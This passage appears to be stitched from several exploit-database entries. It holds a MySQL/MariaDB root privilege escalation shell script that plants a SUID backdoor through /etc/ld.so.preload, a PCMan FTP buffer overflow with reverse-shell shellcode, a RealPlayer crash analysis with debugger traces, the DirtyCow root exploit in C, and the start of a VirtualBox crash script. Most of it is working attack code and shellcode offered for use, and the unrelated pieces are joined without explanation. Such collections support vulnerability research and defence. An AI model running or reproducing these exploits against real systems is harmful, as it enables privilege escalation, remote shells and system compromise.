}
function ctrl_c() {
echo -e "\n[+] Active exploitation aborted. Remember you can use -deferred switch for deferred exploitation."
cleanexit 0
}
#intro
echo -e "\033[94m \nMySQL / MariaDB / PerconaDB - Root Privilege Escalation PoC Exploit \nmysql-chowned.sh (ver. 1.0)\n\nCVE-2016-6664 / OCVE-2016-5617\n"
echo -e "Discovered and coded by: \n\nDawid Golunski \nhttp://legalhackers.com \033[0m"
# Args
if [ $# -lt 1 ]; then
echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"
echo -e "It seems that this server uses: `ps aux | grep mysql | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"
exit 3
fi
# Priv check
echo -e "\n[+] Starting the exploit as \n\033[94m`id`\033[0m"
id | grep -q mysql
if [ $? -ne 0 ]; then
echo -e "\n[!] You need to execute the exploit as mysql user! Exiting.\n"
exit 3
fi
# Set target paths
ERRORLOG="$1"
if [ ! -f $ERRORLOG ]; then
echo -e "\n[!] The specified MySQL catalina.out log ($ERRORLOG) doesn't exist. Try again.\n"
exit 3
fi
echo -e "\n[+] Target MySQL log file set to $ERRORLOG"
# [ Active exploitation ]
trap ctrl_c INT
# Compile privesc preload library
echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"
cat <<_solibeof_>$PRIVESCSRC
#define _GNU_SOURCE
#include <stdio.h>
#include <sys/stat.h>
#include <unistd.h>
#include <dlfcn.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <fcntl.h>
uid_t geteuid(void) {
static uid_t (*old_geteuid)();
old_geteuid = dlsym(RTLD_NEXT, "geteuid");
if ( old_geteuid() == 0 ) {
chown("$BACKDOORPATH", 0, 0);
chmod("$BACKDOORPATH", 04777);
//unlink("/etc/ld.so.preload");
}
return old_geteuid();
}
_solibeof_
/bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"
if [ $? -ne 0 ]; then
echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."
cleanexit 2;
fi
# Prepare backdoor shell
cp $BACKDOORSH $BACKDOORPATH
echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"
# Safety check
if [ -f /etc/ld.so.preload ]; then
echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."
exit 2
fi
# Symlink the log file to /etc
rm -f $ERRORLOG && ln -s /etc/ld.so.preload $ERRORLOG
if [ $? -ne 0 ]; then
echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."
cleanexit 3
fi
echo -e "\n[+] Symlink created at: \n`ls -l $ERRORLOG`"
# Wait for MySQL to re-open the logs
echo -ne "\n[+] Waiting for MySQL to re-open the logs/MySQL service restart...\n"
read -p "Do you want to kill mysqld process to instantly get root? :) ? [y/n] " THE_ANSWER
if [ "$THE_ANSWER" = "y" ]; then
echo -e "Got it. Executing 'killall mysqld' now..."
killall mysqld
fi
while :; do
sleep 0.1
if [ -f /etc/ld.so.preload ]; then
echo $PRIVESCLIB > /etc/ld.so.preload
rm -f $ERRORLOG
break;
fi
done
# /etc/ dir should be owned by mysql user at this point
# Inject the privesc.so shared library to escalate privileges
echo $PRIVESCLIB > /etc/ld.so.preload
echo -e "\n[+] MySQL restarted. The /etc/ld.so.preload file got created with mysql privileges: \n`ls -l /etc/ld.so.preload`"
echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"
echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"
chmod 755 /etc/ld.so.preload
# Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)
echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"
sudo 2>/dev/null >/dev/null
#while :; do
# sleep 0.1
# ps aux | grep mysqld | grep -q 'log-error'
# if [ $? -eq 0 ]; then
# break;
# fi
#done
# Check for the rootshell
ls -l $BACKDOORPATH
ls -l $BACKDOORPATH | grep rws | grep -q root
if [ $? -eq 0 ]; then
echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"
echo -e "\n\033[94mGot root! The database server has been ch-OWNED !\033[0m"
else
echo -e "\n[!] Failed to get root"
cleanexit 2
fi
# Execute the rootshell
echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"
$BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"
$BACKDOORPATH -p
# Job done.
cleanexit 0
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# Exploit Title: PCMan's FTP Server 2.0.7 UMASK Command Buffer Overflow Exploit
# Date: 1/11/2016
# Exploit Author: Eagleblack
# Tested on: Windows XP Profesional SP3 Spanish version x86
# CVE : N/A
import socket
ret="\x10\xb3\x3d\x7e" #USER32 this dll have a jump to ESP stack pointer
#Metasploit shellcode:
#msfvenom -p windows/shell_reverse_tcp LHOST='IP address Local host' LPORT='' -b '\x00\x0a\x0d' -f c
shellcode = ("\xd9\xe5\xba\x7e\xd1\x2c\x95\xd9\x74\x24\xf4\x58\x33\xc9\xb1"
"\x52\x31\x50\x17\x83\xe8\xfc\x03\x2e\xc2\xce\x60\x32\x0c\x8c"
"\x8b\xca\xcd\xf1\x02\x2f\xfc\x31\x70\x24\xaf\x81\xf2\x68\x5c"
"\x69\x56\x98\xd7\x1f\x7f\xaf\x50\x95\x59\x9e\x61\x86\x9a\x81"
"\xe1\xd5\xce\x61\xdb\x15\x03\x60\x1c\x4b\xee\x30\xf5\x07\x5d"
"\xa4\x72\x5d\x5e\x4f\xc8\x73\xe6\xac\x99\x72\xc7\x63\x91\x2c"
"\xc7\x82\x76\x45\x4e\x9c\x9b\x60\x18\x17\x6f\x1e\x9b\xf1\xa1"
"\xdf\x30\x3c\x0e\x12\x48\x79\xa9\xcd\x3f\x73\xc9\x70\x38\x40"
"\xb3\xae\xcd\x52\x13\x24\x75\xbe\xa5\xe9\xe0\x35\xa9\x46\x66"
"\x11\xae\x59\xab\x2a\xca\xd2\x4a\xfc\x5a\xa0\x68\xd8\x07\x72"
"\x10\x79\xe2\xd5\x2d\x99\x4d\x89\x8b\xd2\x60\xde\xa1\xb9\xec"
"\x13\x88\x41\xed\x3b\x9b\x32\xdf\xe4\x37\xdc\x53\x6c\x9e\x1b"
"\x93\x47\x66\xb3\x6a\x68\x97\x9a\xa8\x3c\xc7\xb4\x19\x3d\x8c"
"\x44\xa5\xe8\x03\x14\x09\x43\xe4\xc4\xe9\x33\x8c\x0e\xe6\x6c"
"\xac\x31\x2c\x05\x47\xc8\xa7\xea\x30\xd3\x30\x83\x42\xd3\x3f"
"\xe8\xca\x35\x55\x1e\x9b\xee\xc2\x87\x86\x64\x72\x47\x1d\x01"
"\xb4\xc3\x92\xf6\x7b\x24\xde\xe4\xec\xc4\x95\x56\xba\xdb\x03"
"\xfe\x20\x49\xc8\xfe\x2f\x72\x47\xa9\x78\x44\x9e\x3f\x95\xff"
"\x08\x5d\x64\x99\x73\xe5\xb3\x5a\x7d\xe4\x36\xe6\x59\xf6\x8e"
"\xe7\xe5\xa2\x5e\xbe\xb3\x1c\x19\x68\x72\xf6\xf3\xc7\xdc\x9e"
"\x82\x2b\xdf\xd8\x8a\x61\xa9\x04\x3a\xdc\xec\x3b\xf3\x88\xf8"
"\x44\xe9\x28\x06\x9f\xa9\x59\x4d\xbd\x98\xf1\x08\x54\x99\x9f"
"\xaa\x83\xde\x99\x28\x21\x9f\x5d\x30\x40\x9a\x1a\xf6\xb9\xd6"
"\x33\x93\xbd\x45\x33\xb6")
buffer = '\x41'* 2006 + ret + '\x90'* 30 + shellcode #EIP overwritten at offset 2006
print "Sending Buffer"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) #open socket
connect = s.connect(('192.168.1.13',21)) #IP address and port (21) from the target
s.recv(1024) #FTPBanner
s.send('USER anonymous\r\n') #Sending USER
s.recv(1024)
s.send('PASS \r\n') #Sending Password (Null password)
s.recv(1024)
s.send('UMASK' + buffer +'\r\n')
s.close()
Tested on: Win7 / Win10 x64
Date: October 20th 2016
Vendor homepage: http://www.real.com
Software link: http://realplayer-download.real.com/free/windows/installer/stubinst/stub/rt1/T10EUDRP/RealTimes-RealPlayer.exe
File version (both realplay.exe and qcpfformat.dll): 18.1.5.705
Exploit author: Alwin Peppels
Found with: Peach Fuzzer
Context:
eax=00000002 ebx=00000000 ecx=0d4cb9a0 edx=00000000 esi=00000000 edi=046abd0c
eip=534013dc esp=00d7e254 ebp=00d7e254 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010202
qcpfformat+0x13dc:
534013dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:00000003=??
Call stack:
# ChildEBP RetAddr Args to Child
WARNING: Stack unwind information not available. Following frames may be wrong.
00 00d7e254 53401e92 00000000 00000000 0d4cb9a0 qcpfformat+0x13dc
01 00d7e2a4 53403342 046abd0c 80004005 00000000 qcpfformat+0x1e92
02 00d7e2d8 53402d37 1d26bbf0 74617276 534018a9 qcpfformat!RMACreateInstance+0xc62
03 00d7e308 534030cb 046abd0c 00000000 74617276 qcpfformat!RMACreateInstance+0x657
04 00d7e328 533e20f0 1ee51040 00000000 00000008 qcpfformat!RMACreateInstance+0x9eb
05 00d7e348 533e1da6 00000008 00d7e370 00000005 smplfsys+0x20f0
06 00d7e374 533e3582 00d7e394 00000000 00000000 smplfsys+0x1da6
07 00d7e38c 5340349f 00000000 00000008 00000000 smplfsys+0x3582
08 00d7e3b4 533e3cd9 00d7e3d0 0d4cb9a4 0d4cb9a4 qcpfformat!RMACreateInstance+0xdbf
09 00d7e3c8 53403597 00000000 00000000 00000000 smplfsys+0x3cd9
0a 00d7e444 533e283c 1d26bbf8 0d4cb9a4 0d4cb9a0 qcpfformat!RMACreateInstance+0xeb7
0b 00d7e460 53402c51 1d26bbf0 00000005 0d4cb9a0 smplfsys+0x283c
0c 00d7e488 57a8a692 1d190950 0ce86fd8 1d26bd48 qcpfformat!RMACreateInstance+0x571
0d 00d7e4f0 57a8adfd 0d49dd78 5865cb7c 00d7e528 mametadata!SetDLLAccessPath+0x18392
0e 00d7e568 585afd7c 0d4aca0c 046a2610 5865cb7c mametadata!SetDLLAccessPath+0x18afd
0f 00d7e5ac 585af1d0 1d26c088 00d7e5fc 00000000 rpcl3260!RMAShutdown+0x2584c
10 00d7e5c0 585ae90a 00000000 1d26c088 03ecd74c rpcl3260!RMAShutdown+0x24ca0
11 00d7e5d8 57c788ba 1d26c088 00d7e5fc 03ecd74c rpcl3260!RMAShutdown+0x243da
12 00d7e608 57c38009 1d26c088 00000002 1d26c088 rpmn3260!SetDLLAccessPath+0x58b1a
13 00d7e628 585bc25e 1d26c088 1d26c088 00000000 rpmn3260!SetDLLAccessPath+0x18269
Disassembly:
qcpfformat+0x13d0:
534013d0 55 push ebp
534013d1 8bec mov ebp,esp
534013d3 83794000 cmp dword ptr [ecx+40h],0
534013d7 8b5508 mov edx,dword ptr [ebp+8]
534013da 7422 je qcpfformat+0x13fe (534013fe)
534013dc 0fb64203 movzx eax,byte ptr [edx+3]
534013e0 0fb64a02 movzx ecx,byte ptr [edx+2]
534013e4 c1e008 shl eax,8
The edx register is being zeroed out by the move from ebp+8 at +13d7, causing the memory read at instruction 13dc to point to 0x00000003
In the analysis below the PoC files place in memory starts at 0b880012
Here the first VRAT tag (hex 76 72 61 74) is read in correctly the first time from 0b881044. As can be seen in the instructions above that, on the first iteration EBP is pointing at the tags but is quickly set to an address outside the file.
Breakpoint 1 hit
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d0 esp=00bce58c ebp=0b881040 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d0:
54cd13d0 55 push ebp
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d1 esp=00bce588 ebp=0b881040 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d1:
54cd13d1 8bec mov ebp,esp
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d3 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl zr na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000246
qcpfformat+0x13d3:
54cd13d3 83794000 cmp dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881040 esi=1c534270 edi=1ca9efb4
eip=54cd13d7 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13d7:
54cd13d7 8b5508 mov edx,dword ptr [ebp+8] ss:002b:00bce590=0b881044
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13da esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13da:
54cd13da 7422 je qcpfformat+0x13fe (54cd13fe) [br=0]
0:000> t
eax=0b881044 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13dc esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13dc:
54cd13dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:0b881047=74
0:000> t
eax=00000074 ebx=00bce5e8 ecx=1c534270 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e0 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e0:
54cd13e0 0fb64a02 movzx ecx,byte ptr [edx+2] ds:002b:0b881046=61
0:000> t
eax=00000074 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e4 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e4:
54cd13e4 c1e008 shl eax,8
0:000> t
eax=00007400 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e7 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13e7:
54cd13e7 0bc1 or eax,ecx
0:000> t
eax=00007461 ebx=00bce5e8 ecx=00000061 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13e9 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13e9:
54cd13e9 0fb64a01 movzx ecx,byte ptr [edx+1] ds:002b:0b881045=72
0:000> t
eax=00007461 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13ed esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13ed:
54cd13ed c1e008 shl eax,8
0:000> t
eax=00746100 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f0 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f0:
54cd13f0 0bc1 or eax,ecx
0:000> t
eax=00746172 ebx=00bce5e8 ecx=00000072 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f2 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f2:
54cd13f2 0fb60a movzx ecx,byte ptr [edx] ds:002b:0b881044=76
0:000> t
eax=00746172 ebx=00bce5e8 ecx=00000076 edx=0b881044 esi=1c534270 edi=1ca9efb4
eip=54cd13f5 esp=00bce588 ebp=00bce588 iopl=0 nv up ei pl nz na pe nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000206
qcpfformat+0x13f5:
54cd13f5 c1e008 shl eax,8
So now both ESP and EBP are pointing outside the source file, causing the next iteration to read NULL into EDX, setting up the access violation:
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d0 esp=00bce4d0 ebp=00bce51c iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d0:
54cd13d0 55 push ebp
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d1 esp=00bce4cc ebp=00bce51c iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d1:
54cd13d1 8bec mov ebp,esp
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d3 esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei ng nz ac po cy
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000293
qcpfformat+0x13d3:
54cd13d3 83794000 cmp dword ptr [ecx+40h],0 ds:002b:1c5342b0=00000001
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=54cd5394 esi=00000000 edi=04905784
eip=54cd13d7 esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13d7:
54cd13d7 8b5508 mov edx,dword ptr [ebp+8] ss:002b:00bce4d4=00000000
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
eip=54cd13da esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13da:
54cd13da 7422 je qcpfformat+0x13fe (54cd13fe) [br=0]
0:000> t
eax=00000002 ebx=00000000 ecx=1c534270 edx=00000000 esi=00000000 edi=04905784
eip=54cd13dc esp=00bce4cc ebp=00bce4cc iopl=0 nv up ei pl nz na po nc
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00000202
qcpfformat+0x13dc:
54cd13dc 0fb64203 movzx eax,byte ptr [edx+3] ds:002b:00000003=??
POC:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/40617.zip
/*
*
* EDB-Note: After getting a shell, doing "echo 0 > /proc/sys/vm/dirty_writeback_centisecs" may make the system more stable.
*
* (un)comment correct payload first (x86 or x64)!
*
* $ gcc cowroot.c -o cowroot -pthread
* $ ./cowroot
* DirtyCow root privilege escalation
* Backing up /usr/bin/passwd.. to /tmp/bak
* Size of binary: 57048
* Racing, this may take a while..
* /usr/bin/passwd is overwritten
* Popping root shell.
* Don't forget to restore /tmp/bak
* thread stopped
* thread stopped
* root@box:/root/cow# id
* uid=0(root) gid=1000(foo) groups=1000(foo)
*/
#include <stdio.h>
#include <stdlib.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <pthread.h>
#include <string.h>
#include <unistd.h>
void *map;
int f;
int stop = 0;
struct stat st;
char *name;
pthread_t pth1,pth2,pth3;
// change if no permissions to read
char suid_binary[] = "/usr/bin/passwd";
/*
* $ msfvenom -p linux/x64/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
*/
unsigned char sc[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0xb1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xea, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x6a, 0x3b, 0x58, 0x99,
0x48, 0xbb, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x53, 0x48,
0x89, 0xe7, 0x68, 0x2d, 0x63, 0x00, 0x00, 0x48, 0x89, 0xe6, 0x52, 0xe8,
0x0a, 0x00, 0x00, 0x00, 0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73,
0x68, 0x00, 0x56, 0x57, 0x48, 0x89, 0xe6, 0x0f, 0x05
};
unsigned int sc_len = 177;
/*
* $ msfvenom -p linux/x86/exec CMD=/bin/bash PrependSetuid=True -f elf | xxd -i
unsigned char sc[] = {
0x7f, 0x45, 0x4c, 0x46, 0x01, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x03, 0x00, 0x01, 0x00, 0x00, 0x00,
0x54, 0x80, 0x04, 0x08, 0x34, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x34, 0x00, 0x20, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x80, 0x04, 0x08, 0x00, 0x80, 0x04, 0x08, 0x88, 0x00, 0x00, 0x00,
0xbc, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00,
0x31, 0xdb, 0x6a, 0x17, 0x58, 0xcd, 0x80, 0x6a, 0x0b, 0x58, 0x99, 0x52,
0x66, 0x68, 0x2d, 0x63, 0x89, 0xe7, 0x68, 0x2f, 0x73, 0x68, 0x00, 0x68,
0x2f, 0x62, 0x69, 0x6e, 0x89, 0xe3, 0x52, 0xe8, 0x0a, 0x00, 0x00, 0x00,
0x2f, 0x62, 0x69, 0x6e, 0x2f, 0x62, 0x61, 0x73, 0x68, 0x00, 0x57, 0x53,
0x89, 0xe1, 0xcd, 0x80
};
unsigned int sc_len = 136;
*/
void *madviseThread(void *arg)
{
char *str;
str=(char*)arg;
int i,c=0;
for(i=0;i<1000000 && !stop;i++) {
c+=madvise(map,100,MADV_DONTNEED);
}
printf("thread stopped\n");
}
void *procselfmemThread(void *arg)
{
char *str;
str=(char*)arg;
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<1000000 && !stop;i++) {
lseek(f,map,SEEK_SET);
c+=write(f, str, sc_len);
}
printf("thread stopped\n");
}
void *waitForWrite(void *arg) {
char buf[sc_len];
for(;;) {
FILE *fp = fopen(suid_binary, "rb");
fread(buf, sc_len, 1, fp);
if(memcmp(buf, sc, sc_len) == 0) {
printf("%s is overwritten\n", suid_binary);
break;
}
fclose(fp);
sleep(1);
}
stop = 1;
printf("Popping root shell.\n");
printf("Don't forget to restore /tmp/bak\n");
system(suid_binary);
}
int main(int argc,char *argv[]) {
char *backup;
printf("DirtyCow root privilege escalation\n");
printf("Backing up %s.. to /tmp/bak\n", suid_binary);
asprintf(&backup, "cp %s /tmp/bak", suid_binary);
system(backup);
f = open(suid_binary,O_RDONLY);
fstat(f,&st);
printf("Size of binary: %d\n", st.st_size);
char payload[st.st_size];
memset(payload, 0x90, st.st_size);
memcpy(payload, sc, sc_len+1);
map = mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
printf("Racing, this may take a while..\n");
pthread_create(&pth1, NULL, &madviseThread, suid_binary);
pthread_create(&pth2, NULL, &procselfmemThread, payload);
pthread_create(&pth3, NULL, &waitForWrite, NULL);
pthread_join(pth3, NULL);
return 0;
}
#Exploit Title: Oracle VM VirtualBox 4.3.28 Crash
#Author: sultan albalawi
#Tested on:win7
#open viryualbox -->ctrl+i-->choose file -->double+double+double next
ban= '\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x5c\x20\x20\x20\x2d\x20\x20'
ban+='\x2d\x20\x20\x2d\x20\x3c\x73\x65\x72\x76\x65\x72\x3e\x20\x20\x2d'
ban+='\x20\x5c\x2d\x2d\x2d\x3c\x20\x2d\x20\x2d\x20\x20\x2d\x20\x2d\x20'
ban+='\x20\x2d\x20\x20\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x0d\x0a\x20\x20\x20'
ban+='\x20\x20\x20\x20\x7c\x20\x20\x20\x20\x44\x6f\x63\x5f\x41\x74\x74'
ban+='\x61\x63\x6b\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x7c\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x76\x20\x20\x20\x20\x20\x20\x20\x20\x60\x20\x60\x2e'
ban+='\x20\x20\x20\x20\x2c\x3b\x27\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x41\x70\x50'
ban+='\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x60\x2e\x20\x20\x2c\x27\x2f\x20\x2e\x27'
ban+='\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x60\x2e\x20\x58\x20\x2f\x2e\x27\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x20\x2a\x20\x20\x20\x20\x20\x2a\x2a\x2a'
ban+='\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x0d\x0a\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2e\x2d\x3b\x2d\x2d\x27\x27\x2d\x2d\x2e\x5f\x60\x20'
ban+='\x60\x20\x28\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x7c\x0d'
ban+='\x0a\x20\x20\x20\x20\x20\x2e\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x2f\x20\x20\x20\x20\x27\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x20\x20\x7c\x20\x64\x61\x74\x61\x62\x61\x73\x65\x0d\x0a\x20'
ban+='\x20\x20\x20\x20\x3b\x53\x65\x63\x75\x72\x69\x74\x79\x60\x20\x20'
ban+='\x27\x20\x30\x20\x20\x30\x20\x27\x20\x20\x20\x20\x20\x20\x20\x20'
ban+='\x20\x2a\x2a\x2a\x4e\x45\x54\x2a\x2a\x2a\x20\x20\x20\x20\x20\x20'
ban+='\x20\x7c\x0d\x0a\x20\x20\x20\x20\x2c\x20\x20\x20\x20\x20\x20\x20'
ban+='\x2c\x20\x20\x20\x20\x27\x20\x20\x7c\x20\x20\x27\x20\x20\x20\x20'
ban+='\x20\x20\x20\x20\x20\x20\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x2a\x20'
